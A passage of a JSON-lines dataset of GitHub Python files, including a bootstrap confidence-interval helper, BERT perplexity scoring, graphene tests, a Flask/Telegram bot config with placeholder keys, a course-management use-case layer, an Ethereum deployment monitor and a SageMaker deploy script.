statistic=function_to_ci,\r\n vectorized=False,\r\n n_resamples=boot_n_resamples,\r\n batch=None,\r\n axis=0,\r\n confidence_level=ci_level,\r\n method=boot_method,\r\n random_state=None\r\n )\r\n ),\r\n to_ci.items()\r\n )\r\n )\r\n index = pd.Series(map(lambda x: x[0], ci))\r\n low_ci = pd.Series(map(lambda x: x[1].confidence_interval.low, ci))\r\n high_ci = pd.Series(map(lambda x: x[1].confidence_interval.high, ci))\r\n ci = pd.concat([low_ci, high_ci], axis=1)\r\n ci.index = index\r\n ci.columns = [\"lower_ci\", \"upper_ci\"]\r\n\r\n ci = ci * 100\r\n ci = round(ci, 
digit)\r\n\r\n if return_annot_df is False:\r\n ci_output = ci\r\n else:\r\n ci = ci.astype(str)\r\n ci_output = '[' + ci[\"lower_ci\"]\r\n ci_output = ci_output.add(', ')\r\n ci_output = ci_output.add(ci[\"upper_ci\"])\r\n ci_output = pd.DataFrame(ci_output.add(']')).transpose()\r\n ci_output.index = [stage_device_name]\r\n\r\n return ci_output\r\n","repo_name":"SRI-human-sleep/sleep_tracker_menu","sub_path":"utils/confidence_interval.py","file_name":"confidence_interval.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"21546059068","text":"from random import randint\nlista = []\nimpares = []\n\nfor i in range(10):\n lista.append(randint(0,50))\n\ntamanho = len(lista)\nfor i in range(tamanho):\n if lista[i] % 2 == 1:\n impares.append(lista[i])\n\nprint(f'A lista de números é {lista}')\nprint(f'A partir da lista de números separamos os ímpares que são: {impares}')\n","repo_name":"santosclaudinei/Python_Geek_University","sub_path":"sec07_ex20.py","file_name":"sec07_ex20.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7942928041","text":"import turtle\n\njoey = turtle.Turtle()\nrico = turtle.Turtle()\nethan = turtle.Turtle()\n\n\njoey.speed(15)\nrico.speed(15)\nethan.speed(15)\n\n\njoey.color(\"forest green\")\n\njoey.penup()\njoey.begin_fill()\njoey.penup()\njoey.goto(0, -200)\njoey.pendown()\njoey.left(180)\njoey.forward(321)\njoey.left(90)\njoey.forward(175)\njoey.left(90)\njoey.forward(630)\njoey.left(90)\njoey.forward(175)\njoey.left(90)\njoey.forward(321)\njoey.end_fill()\njoey.pendown()\n\nturtle.bgcolor(\"Sky blue\")\n\n\nrico.color(\"red\")\nrico.begin_fill()\nrico.goto(-100, -100)\nrico.right(90)\nrico.forward(100)\nrico.left(90)\nrico.forward(200)\nrico.left(90)\nrico.forward(100)\nrico.goto(0, 0)\nrico.goto(-100, -100)\nrico.goto(100, 
-100)\nrico.end_fill()\n\n\nethan.color(\"black\")\nethan.begin_fill()\nethan.goto(-100, -100)\nethan.goto(100, -100)\nethan.goto(0, 0)\nethan.end_fill()\nethan.penup()\nethan.goto(-80, -140)\nethan.pendown()\n\nethan.begin_fill()\nethan.color(\"brown\")\n\n\ndef square(sidelength):\n for i in range(4):\n ethan.forward(sidelength)\n ethan.right(90)\n\n\nfor i in range(1):\n square(20)\nethan.end_fill()\n\nturtle.exitonclick()","repo_name":"Euphumum/Landscape","sub_path":"Landscape.py","file_name":"Landscape.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33266286934","text":"import datasets, transformers\nfrom transformers import BertTokenizer, BertForMaskedLM\nfrom bert_perplexity.perplexity import PerplexityPipeline\nimport os\nimport platform\nfrom tqdm import tqdm\n\nop_sys = platform.system()\nif op_sys == \"Windows\":\n PRETRAINED_MODELS_DIR = \"F:/pretrained_models\"\n DATASETS_DIR = \"F:/datasets\"\nelif op_sys == \"Linux\":\n PRETRAINED_MODELS_DIR = \"/users/uestc1/zys/pretrained_models\"\n DATASETS_DIR = \"/users/uestc1/zys/Datasets\"\n\n\n# download if not exists cache_dir\ndef load_model(hf_name=None, cache_dir=None, download=False):\n if download:\n assert not cache_dir\n assert hf_name\n else:\n assert not hf_name\n assert cache_dir\n if download:\n model = download_model_files()\n else:\n model = load_from_cache()\n return model\n\n\n# download_model_files\ndef download_model_files(pretrained_models_dir=PRETRAINED_MODELS_DIR, hf_name=\"bert-base-uncased\",\n ):\n cache_dir = os.path.join(pretrained_models_dir)\n en_tokenizer = BertTokenizer.from_pretrained(\n hf_name,\n cache_dir=cache_dir\n )\n en_model = BertForMaskedLM.from_pretrained(\n hf_name,\n cache_dir=cache_dir\n )\n en_pipeline = PerplexityPipeline(model=en_model, tokenizer=en_tokenizer)\n return en_pipeline\n\n\ndef load_from_cache(pretrained_models_dir=PRETRAINED_MODELS_DIR,\n # 
bert-base-uncased\n # model_name=\"models--bert-base-uncased/snapshots/1dbc166cf8765166998eff31ade2eb64c8a40076\"\n # bert-base-multilingual-cased\n model_name=\"models--bert-base-multilingual-cased/snapshots/fdfce55e83dbed325647a63e7e1f5de19f0382ba\"\n ):\n en_tokenizer = BertTokenizer.from_pretrained(\n os.path.join(pretrained_models_dir, model_name)\n )\n en_model = BertForMaskedLM.from_pretrained(\n os.path.join(pretrained_models_dir, model_name)).cuda()\n en_pipeline = PerplexityPipeline(model=en_model, tokenizer=en_tokenizer)\n return en_pipeline\n\n\ndef ppl(model, text):\n result = model(text)\n return result\n\n\ndef main():\n model_version = \"bert-base-uncased\"\n model = load_model(cache_dir=True, download=False)\n datasets_dir = DATASETS_DIR\n # train_dataset = datasets.load_dataset(path='wmt16', name=\"de-en\", split=\"train\",\n # cache_dir=datasets_dir)\n train_dataset = datasets.load_dataset(\n os.path.join(datasets_dir,\n \"wmt16\"),\n name=\"de-en\",\n split=\"train\")\n test_texts = [\"there is a book on the desk\",\n \"there is a plane on the desk\",\n \"there is a book in the desk\"]\n for t in test_texts:\n print(ppl(model, t)[\"ppl\"])\n\n data_lenth = len(train_dataset)\n score = [0] * data_lenth\n for idx, row in tqdm(enumerate(train_dataset)):\n model\n en, de = row[\"translation\"][\"en\"], row[\"translation\"][\"de\"]\n score = ppl(model, en)[\"ppl\"] + ppl(model, de)[\"ppl\"]\n\n if (idx + 1) % 1000 == 0:\n print(f\"Score {idx + 1} k /{data_lenth} samples ...\")\n\n index = [\n [116518, 41568, 13049, 39342, 23659, 76413],\n [12051, 113004, 57498, 51064, 47300, 47552],\n [73186, 50806, 17741, 94891, 55986, 44589],\n [69885, 114662, 32893, 103985, 85597, 84899],\n ]\n for i in index:\n for sentence in train_dataset[i][\"translation\"]:\n print(ppl(model, sentence[\"en\"])[\"ppl\"] + ppl(model, sentence[\"de\"])[\"ppl\"])\n print(\"-\" * 30)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"zhangyisheng0629/kenlm_cl","sub_path":"perplex.py","file_name":"perplex.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35108232158","text":"# pylint:disable=missing-docstring,invalid-name,unused-variable\n\nimport typing\n\nimport graphene\n\nimport graphene_resolver as resolver\n\n\ndef test_simple():\n class FirstPet(resolver.Resolver):\n schema = 'Pet!'\n\n def resolve(self, **kwargs):\n return {\n 'name': 'pet1',\n 'age': 1\n }\n\n class Pet(resolver.Resolver):\n schema = {\n 'name': 'String',\n 'age': 'Int',\n }\n\n class Query(graphene.ObjectType):\n first_pet = FirstPet.as_field()\n\n schema = graphene.Schema(query=Query)\n assert str(schema) == '''\\\nschema {\n query: Query\n}\n\ntype Pet {\n name: String\n age: Int\n}\n\ntype Query {\n firstPet: Pet!\n}\n'''\n result = schema.execute('''\\\n{\n firstPet{\n name\n age\n }\n}\n''')\n assert not result.errors\n assert result.data == {\n \"firstPet\": {\"name\": 'pet1',\n 'age': 1}\n }\n\n\ndef test_node():\n pets = [dict(\n id=1,\n name='pet1',\n age=1,\n )]\n\n class FirstPet(resolver.Resolver):\n schema = 'Pet!'\n\n def resolve(self, **kwargs):\n return pets[0]\n\n class Pet(resolver.Resolver):\n schema = {\n 'type': {\n 'name': 'String',\n 'age': 'Int',\n },\n 'interfaces': (graphene.Node,)\n }\n\n def get_node(self, id_):\n return next(i for i in pets if i['id'] == int(id_))\n\n def validate(self, value):\n return (\n isinstance(value, typing.Mapping)\n and isinstance(value.get('name'), str)\n and isinstance(value.get('age'), int)\n )\n\n class Query(graphene.ObjectType):\n first_pet = FirstPet.as_field()\n\n schema = graphene.Schema(query=Query)\n assert str(schema) == '''\\\nschema {\n query: Query\n}\n\ninterface Node {\n id: ID!\n}\n\ntype Pet implements Node {\n id: ID!\n name: String\n age: Int\n}\n\ntype Query {\n firstPet: Pet!\n}\n'''\n result = 
schema.execute('''\\\n{\n firstPet{\n name\n age\n }\n}\n''')\n assert not result.errors\n assert result.data == {\n \"firstPet\": {\"name\": 'pet1',\n 'age': 1}\n }\n","repo_name":"NateScarlet/graphene-resolver","sub_path":"tests/test_dynamic_resolver.py","file_name":"test_dynamic_resolver.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"15374467472","text":"# Chapter 01-3\n# 파이썬 심화\n# 클래스 메소드, 인스턴스 메소드, 스테틱 메소드\n# 코드를 모듈화하여 만들 수 있음 > 패키지로 발전함\n\n# 기본 인스턴스 메소드\nclass Student(object):\n '''\n Student Class\n Author : kim\n Date : 2020.05.21\n Description : Class, Static, Instance Method\n '''\n # 등록금인상률 - 전역 적용되는 class 변수\n tuition_per = 1.0\n\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\n self._id = id\n self._first_name = first_name\n self._last_name = last_name\n self._email = email\n self._grade = grade\n self._tuition = tuition\n self._gpa = gpa\n\n # Instance Method - 각각의 인스턴스를 구분할 수 있는 고유한 값\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {}, {}, {}, {}, {}, {}'.format(self._id, self.full_name(), self._email, self._grade, self._tuition, self._gpa)\n\n def get_fee(self):\n return 'Before Tuition -> Id : {}, Tuition : {}'.format(self._id, self._tuition)\n\n def get_fee_calc(self):\n return 'After Tuition -> Id : {}, fee : {}'.format(self._id, self._tuition * Student.tuition_per)\n \n def __str__(self):\n return 'Student Info -> name : {}, grade : {}, email : {}'.format(self.full_name(), self._grade, self._email)\n\n\n # Class Method\n @classmethod\n def raise_fee(cls, percent):\n if percent <= 1:\n print(\"Please Enter 1 or More\")\n return\n cls.tuition_per = percent # cls == Student\n print(\"Succeed! 
Tuition increased!\")\n \n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition, gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.tuition_per, gpa)\n\n # Static Method\n @staticmethod\n def is_scholarship_st(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. {} is not a scholarshp receipient.'.format(inst.full_name())\n\n# 학생 인스턴스\nstudent_1 = Student(1, 'Kim', 'Sarang', 'test@test.com', 1, 400, 3.5)\nstudent_2 = Student(2, 'Lee', 'Myungho', 'student@nest.com', 2, 500, 4.3)\n\n# 기본정보\nprint(student_1)\nprint(student_2)\n\n# 전체정보\nprint(student_1.detail_info())\nprint(student_2.detail_info())\n\n# 학비 정보 (인상전)\nprint(student_1.get_fee())\nprint(student_2.get_fee())\n\n# 학비 인상(클래스 메소드 미사용) : 직접 접근 NOT GOOD!\n# Student.tuition_per = 1.2\n\n# 학비 정보 (인상후)\nprint(student_1.get_fee_calc())\nprint(student_2.get_fee_calc())\n\n# classmethod로 인상률 변경\nStudent.raise_fee(1.3)\n\nprint(student_1.get_fee_calc())\nprint(student_2.get_fee_calc())\n\n# 클래스 메소드를 활용한(line 51) 인스턴스 생성 실습\nstudent_3 = Student.student_const(3, 'Park', 'Minji', 'gmail@student.com', 3, 550, 4.5)\nstudent_4 = Student.student_const(4, 'Cho', 'Sunghan', 'line@student.com', 4, 600, 4.1)\n\n# 학생 정보\nprint(student_3.detail_info())\nprint(student_4.detail_info())\n\n# 학비가 올랐는지 확인, 53행으로 인해 인상된 가격 적용\nprint(student_3._tuition)\nprint(student_4._tuition) \n\n\n# Static Method\n# 장학금 혜택 여부 (static method 미사용)\ndef is_scholarship(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. 
{} is not a scholarshp receipient.'.format(inst.full_name())\n\n# is_scholarship 함수가 종속된 class가 없음\nprint(is_scholarship(student_1))\nprint(is_scholarship(student_2))\nprint(is_scholarship(student_3))\nprint(is_scholarship(student_4))\n\n# 장학금 혜택 여부 (static method 사용)\nprint(Student.is_scholarship_st(student_1))\nprint(Student.is_scholarship_st(student_2))\nprint(Student.is_scholarship_st(student_3))\nprint(Student.is_scholarship_st(student_4))\n\n# 상속으로 이것도 됨\nprint(student_1.is_scholarship_st(student_4))","repo_name":"bunnycast/python","sub_path":"advanced/chapter01_03.py","file_name":"chapter01_03.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34611593594","text":"import colorlog\nimport logging\n\nchdr = colorlog.StreamHandler()\nfhdr = logging.FileHandler(\"test_log.log\")\nlogger = colorlog.getLogger()\nlogging_fmt = colorlog.ColoredFormatter(\n '%(log_color)s%(asctime)-15s %(levelname)-7s {%(module)s:%(lineno)d} %(message)s'\n)\nf_l_fmt = logging.Formatter('%(asctime)-15s %(levelname)-7s {%(module)s:%(lineno)d} %(message)s')\n\nlogger.setLevel(logging.DEBUG)\nchdr.setFormatter(logging_fmt)\nfhdr.setFormatter(f_l_fmt)\nlogger.addHandler(chdr)\nlogger.addHandler(fhdr)\n\n\nlogging.critical(\"Hello this is critical log\")\nlogging.error(\"Hello this is error log\")\nlogging.warning(\"Hello this is warning log\")\nlogging.info(\"Hello this is info log\")\nlogging.debug(\"Hello this is debug log\")\n","repo_name":"mybeang/workspace3","sub_path":"colorlog_example.py","file_name":"colorlog_example.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39632295583","text":"import matplotlib.pyplot as plt\nfrom matplotlib.backends import qt4_compat\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n\nimport cPickle\nfrom PyQt4 
import QtGui, QtCore\nimport numpy as np\n\n# Custom modules/functions\nimport CarBuyingBackend as backend\n\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n self.fig = plt.Figure(figsize=(width, height), dpi=dpi)\n self.ax = self.fig.add_subplot(111)\n # We want the axes cleared every time plot() is called\n\n FigureCanvas.__init__(self, self.fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QtGui.QSizePolicy.Expanding,\n QtGui.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n self.ax.set_xlabel('Mileage')\n self.ax.set_ylabel('Price')\n self.ax.set_xlim([30000, 90000])\n self.ax.set_ylim([3000, 15000])\n self.ax.grid()\n\nclass carBuyingPlot(MyMplCanvas):\n def __init__(self, name = 'Name', parent = None):\n super(carBuyingPlot, self).__init__(parent=parent)\n self.name = str(name)\n self.curves = {}\n\n def addCurve(self, min, max, avg, name = None, color = 'b'):\n self.curves[name] = Curve(min, max, avg, self.ax, color = color)\n return\n\n def addLegend(self):\n lines = []\n labels = []\n for label in self.curves.keys():\n lines.append(self.curves[label].avg)\n labels.append(label)\n self.legend = self.fig.legend(lines, labels, 'upper right')\n return\n\nclass Curve(object):\n def __init__(self, min, max, avg, ax, color = 'b', label = None, alpha = 0.2):\n self.bounds = self.getBounds(min, max, ax)\n self.avg = self.getAvg(avg, ax, label)\n self.bounds.set_alpha(0.2)\n color = np.random.rand(3)\n self.setColor(color)\n self.setLabel(label)\n self.setAlpha(alpha)\n \n def getBounds(self, min, max, ax):\n x_values = min[:,0]\n bounds = ax.fill_between(x_values, min[:,1], max[:,1], axes = ax)\n return bounds\n\n def getAvg(self, avg, ax, label):\n x_values = avg[:,0]\n avgPlot, = ax.plot(x_values, avg[:,1])\n return avgPlot\n\n def setColor(self, color):\n self._color = color\n 
self.bounds.set_facecolors(color)\n self.avg.set_color(color)\n return\n\n def setAlpha(self, alpha):\n self._alpha = alpha\n self.bounds.set_alpha(alpha)\n return\n\n def updateValues(self, min, max, avg, ax):\n x_values = min[:,0]\n self.bounds = ax.fill_between(x_values, min[:,1], max[:,1], axes = ax, alpha = self._alpha, color = self._color)\n return\n\n def setLabel(self, label):\n self.avg.set_label(label)\n return\n\ndef getTestData(year = '2011'):\n data = backend.getMakeData('Toyota')\n return data.data['Prius'][year]['One Hatchback 4D ']\n\ndef testAddData(years, plot, colors = ['r', 'g', 'b']):\n for i, year in enumerate(years):\n data = getTestData(year = str(year))\n\n min = data['priceMin']\n max = data['priceMax']\n avg = data['price']\n plot.addCurve(min, max, avg, name = str(year), color = colors[i])\n\n plot.addLegend()\n return\n\nif __name__ == '__main__':\n import numpy as np\n\n plot = carBuyingPlot()\n years = [2011, 2013]#, 2013]\n \n testAddData(years, plot)\n plot.show()\n plt.show()","repo_name":"wzaylor/CarBuying","sub_path":"carBuyingPlot.py","file_name":"carBuyingPlot.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18171518714","text":"# This script accesses environment variable:\n# GH_ACCESS_TOKEN\n# This script needs the following package:\n# pip install PyGithub \n\n# testing out the Github API - trying it out here before I use it in search-images.py\nfrom github import Github\n\n# use this to form url to the raw images\nonline_url = 'https://raw.githubusercontent.com/MicrosoftDocs/azure-docs/main/' \n\n# First create a Github instance:\n# using an access token\nimport os\ntoken = os.environ['GH_ACCESS_TOKEN']\ng = Github(token)\n\nrepo = g.get_repo(\"MicrosoftDocs/azure-docs\")\ncontents = repo.get_contents(\"articles/machine-learning/v1/media\")\nwhile contents:\n file_content = contents.pop(0)\n if file_content.type == 
\"dir\":\n contents.extend(repo.get_contents(file_content.path))\n else:\n img_url = online_url + file_content.path\n print(img_url)","repo_name":"sdgilley/search-images","sub_path":"pygithub.py","file_name":"pygithub.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"72590642053","text":"from __compute_polarization__ import get_polarization\nimport networkx as nx\nimport random\nimport time\n\n\ndef random_edge_addition(k, graph_in):\n\n edges_to_add_list = []\n polarizations = [0]*len(k)\n edges_list = list(nx.non_edges(graph_in))\n\n start = time.time()\n\n # run 20 times to sample and then average the results of random edge selection\n for i in range(20):\n for j, k_edge in enumerate(k):\n\n edges_to_add_list = random.sample(edges_list, k_edge)\n\n g_copy = graph_in.copy()\n g_copy.add_edges_from(edges_to_add_list)\n\n polarizations[j] += get_polarization(g_copy)[0]\n\n end = time.time()\n elapsed = end - start\n\n averaged_polarizations = [x / 20 for x in polarizations]\n\n return edges_to_add_list, averaged_polarizations, [elapsed] * len(k)\n","repo_name":"leobouts/social-media-polarization","sub_path":"project/social_polarization/__algorithm_random__.py","file_name":"__algorithm_random__.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36055946052","text":"# coding: utf-8\n# 設置 App.config\nSECRET_KEY = 'b07481bjava7704sd25sd27d53000e6b1daI52f47'\nSESSION_PROTECTION = 'strong'\nJSON_AS_ASCII = False\n#CSRF_ENABLED = True\nTEMPLATES_AUTO_RELOAD = True\n\n# 設置 bot_poc.config\nBOT_API_KEY = \"1234567890:ABCDEFGHIJKKKKKKKKKK\"\nBOT_HOOK_URL = 
\"https://Domainnnnnnnnnnnnn/hook\"","repo_name":"keoy7am/chat_match_telegram_bot","sub_path":"bot_poc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"44"} +{"seq_id":"1780404356","text":"from abc import ABC, abstractmethod\nfrom typing import Optional, cast\n\nimport shortuuid\n\nfrom app.domain.course import (\n Course,\n CourseNameAlreadyExistsError,\n CourseNotFoundError,\n CourseRepository,\n)\n\nfrom ...domain.review.review import Review\nfrom ..collab.collab_query_model import CollabReadModel\nfrom ..content.content_command_model import ContentCreateModel, ContentUpdateModel\nfrom ..content.content_query_model import ContentReadModel\nfrom ..review.review_command_model import ReviewCreateModel\nfrom .course_command_model import CourseCreateModel, CourseUpdateModel\nfrom .course_query_model import CourseReadModel\n\n\nclass CourseCommandUseCaseUnitOfWork(ABC):\n\n course_repository: CourseRepository\n\n @abstractmethod\n def begin(self):\n raise NotImplementedError\n\n @abstractmethod\n def commit(self):\n raise NotImplementedError\n\n @abstractmethod\n def rollback(self):\n raise NotImplementedError\n\n\nclass CourseCommandUseCase(ABC):\n @abstractmethod\n def create_course(\n self, data: CourseCreateModel, creator_id: str\n ) -> Optional[CourseReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def update_course(\n self, id: str, data: CourseUpdateModel\n ) -> Optional[CourseReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def delete_course_by_id(self, id: str):\n raise NotImplementedError\n\n @abstractmethod\n def add_collab(self, course_id: str, user_id: str) -> Optional[CollabReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def deactivate_collab_from_course(self, user_id: str, course_id: str):\n raise NotImplementedError\n\n @abstractmethod\n def add_content(self, data, course_id):\n raise 
NotImplementedError\n\n @abstractmethod\n def update_content(\n self, course_id: str, data: ContentUpdateModel, content_id: str\n ) -> Optional[ContentReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def user_involved(self, course_id: str, user_id: str) -> bool:\n raise NotImplementedError\n\n @abstractmethod\n def add_review(self, id: str, data: ReviewCreateModel):\n raise NotImplementedError\n\n\nclass CourseCommandUseCaseImpl(CourseCommandUseCase):\n def __init__(\n self,\n uow: CourseCommandUseCaseUnitOfWork,\n ):\n self.uow: CourseCommandUseCaseUnitOfWork = uow\n\n def create_course(\n self, data: CourseCreateModel, creator_id: str\n ) -> Optional[CourseReadModel]:\n try:\n uuid = shortuuid.uuid()\n course = Course(\n id=uuid,\n creator_id=creator_id,\n name=data.name,\n price=data.price,\n active=True,\n language=data.language,\n country=data.country,\n description=data.description,\n categories=data.categories,\n presentation_video=data.presentation_video,\n image=data.image,\n subscription_id=data.subscription_id,\n recommendations={},\n )\n\n existing_course = self.uow.course_repository.find_by_name(data.name)\n if existing_course is not None:\n raise CourseNameAlreadyExistsError\n self.uow.course_repository.create(course)\n self.uow.commit()\n\n created_course = self.uow.course_repository.find_by_id(uuid)\n except:\n self.uow.rollback()\n raise\n\n return CourseReadModel.from_entity(cast(Course, created_course))\n\n def update_course(\n self, id: str, data: CourseUpdateModel\n ) -> Optional[CourseReadModel]:\n try:\n existing_course = self.uow.course_repository.find_by_id(id)\n if existing_course is None:\n raise CourseNotFoundError\n\n course = Course(\n id=id,\n creator_id=existing_course.creator_id,\n name=data.name,\n price=existing_course.price,\n language=data.language,\n country=existing_course.country,\n active=True,\n description=data.description,\n categories=data.categories,\n presentation_video=data.presentation_video,\n 
image=data.image,\n recommendations={},\n subscription_id=data.subscription_id,\n created_at=existing_course.created_at,\n )\n\n self.uow.course_repository.update(course)\n\n updated_course = self.uow.course_repository.find_by_id(course.id)\n\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return CourseReadModel.from_entity(cast(Course, updated_course))\n\n def delete_course_by_id(self, id: str):\n try:\n existing_course = self.uow.course_repository.find_by_id(id)\n if existing_course is None:\n raise CourseNotFoundError\n\n self.uow.course_repository.delete_by_id(id)\n\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n def add_collab(self, course_id: str, user_id: str) -> Optional[CollabReadModel]:\n try:\n course = self.uow.course_repository.find_by_id(course_id)\n if course is None:\n raise CourseNotFoundError\n collab = self.uow.course_repository.add_collab(\n course_id=course_id, user_id=user_id\n )\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return collab\n\n def deactivate_collab_from_course(self, user_id: str, course_id: str):\n try:\n course = self.uow.course_repository.find_by_id(course_id)\n if course is None:\n raise CourseNotFoundError\n self.uow.course_repository.deactivate_collab_from_course(user_id, course_id)\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n def add_content(\n self, data: ContentCreateModel, course_id: str\n ) -> Optional[ContentReadModel]:\n try:\n course = self.uow.course_repository.find_by_id(course_id)\n if course is None:\n raise CourseNotFoundError\n content = self.uow.course_repository.add_content(\n data=data, course_id=course_id\n )\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return content\n\n def update_content(\n self, course_id: str, data: ContentUpdateModel, content_id: str\n ) -> Optional[ContentReadModel]:\n try:\n existing_course = self.uow.course_repository.find_by_id(course_id)\n if existing_course is None:\n raise 
CourseNotFoundError\n updated_content = self.uow.course_repository.update_content_from_course(\n course_id=course_id, data=data, content_id=content_id\n )\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return updated_content\n\n def user_involved(self, course_id: str, user_id: str) -> bool:\n return self.uow.course_repository.user_involved(\n course_id=course_id, user_id=user_id\n )\n\n def add_review(self, id: str, data: ReviewCreateModel):\n try:\n existing_course = self.uow.course_repository.find_by_id(id)\n if existing_course is None:\n raise CourseNotFoundError\n rev = Review(\n id=data.id,\n course_id=id,\n recommended=data.recommended,\n review=data.review,\n )\n review = self.uow.course_repository.add_review(review=rev)\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return review\n","repo_name":"Ubademy/ubademy.service.courses","sub_path":"app/usecase/course/course_command_usecase.py","file_name":"course_command_usecase.py","file_ext":"py","file_size_in_byte":7996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"25367494678","text":"from base import BlockEvent, BaseMonitor, Transaction\nfrom models import session, tokens_details, Contract, Network\n\n\nclass EthSendingMonitor(BaseMonitor):\n event_type = 'launch'\n\n def on_new_block_event(self, block_event: BlockEvent):\n\n deploy_hashes = {}\n for transactions_list in block_event.transactions_by_address.values():\n for transaction in transactions_list:\n deploy_hashes[transaction.tx_hash.lower()] = transaction\n\n details_with_whitelabel = []\n for detail in tokens_details:\n result = session.query(detail, Contract, Network).join(Contract, detail.contract_id == Contract.id) \\\n .filter(Contract.network_id == Network.id) \\\n .filter(detail.white_label_hash.in_(deploy_hashes.keys())) \\\n .filter(Network.name == block_event.network.type)\n\n details_with_whitelabel.extend(result)\n\n for details in 
details_with_whitelabel:\n print(\"contract_id: \", details[0].contract_id,\n 'white_label hash: ',details[0].white_label_hash)\n transaction: Transaction = deploy_hashes[details[0].white_label_hash]\n tx_receipt = block_event.network.get_tx_receipt(transaction.tx_hash)\n\n message = {\n 'contractId': details[0].contract_id,\n 'transactionHash': transaction.tx_hash,\n 'address': transaction.creates,\n 'success': tx_receipt.success,\n 'status': 'COMMITTED'\n }\n\n self.send_to_backend(message)\n","repo_name":"MyWishPlatform/mywill_scanner","sub_path":"monitors/contract/eth_sending.py","file_name":"eth_sending.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"10933594719","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostCreateForm\nfrom .models import Post\n\ndef home(request):\n template = 'blog/home.html'\n posts = Post.objects.all().order_by('-updated')\n context = {\n 'posts': posts,\n }\n return render(request,template,context)\n\n@login_required(login_url='/accounts/login/') \ndef create(request):\n template = 'blog/create.html'\n form = PostCreateForm()\n \n\n if request.method == 'POST':\n post_create = PostCreateForm(request.POST)\n if post_create.is_valid():\n \n post_create.save()\n messages.success(request, f'Your Post is created successfully !')\n return redirect('User:home') \n context = {\n 'form':form,\n }\n return render(request,template,context)","repo_name":"prathmesh2048/Tradexa_assignment","sub_path":"User/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"16822889818","text":"import argparse\nimport boto3\nimport sagemaker\nfrom sagemaker.estimator import Estimator\n\n\nparser = 
argparse.ArgumentParser(description='Deploy a trained model to SageMaker endpoint.')\nparser.add_argument('region', type=str,\n help='Default region when creating new connections.')\nparser.add_argument('train_job', type=str,\n help='Name of training job to attach to.')\nparser.add_argument('-e', '--endpoint_name', type=str, default=None, metavar='',\n help='Name to assign to SageMaker endpoint.')\nargs = parser.parse_args()\n\n\nif __name__ == '__main__':\n boto3_sess = boto3.Session(region_name=args.region)\n sagemaker_sess = sagemaker.Session(boto3_sess)\n attached_estimator = Estimator.attach(args.train_job,\n sagemaker_session=sagemaker_sess)\n print(\"\\nDeploying model...\")\n _ = attached_estimator.deploy(initial_instance_count=1,\n instance_type='ml.t2.medium',\n endpoint_name=args.endpoint_name)\n print(\"\\nModel is deployed.\\n\")\n","repo_name":"michotross257/stsci-image-classification","sub_path":"sagemaker-deploy-existing-model.py","file_name":"sagemaker-deploy-existing-model.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42980885506","text":"import csv\n\nfrom itertools import product\n\nfrom os.path import join\n\nfrom tqdm import tqdm\n\nfrom numpy import ndarray\n\nfrom 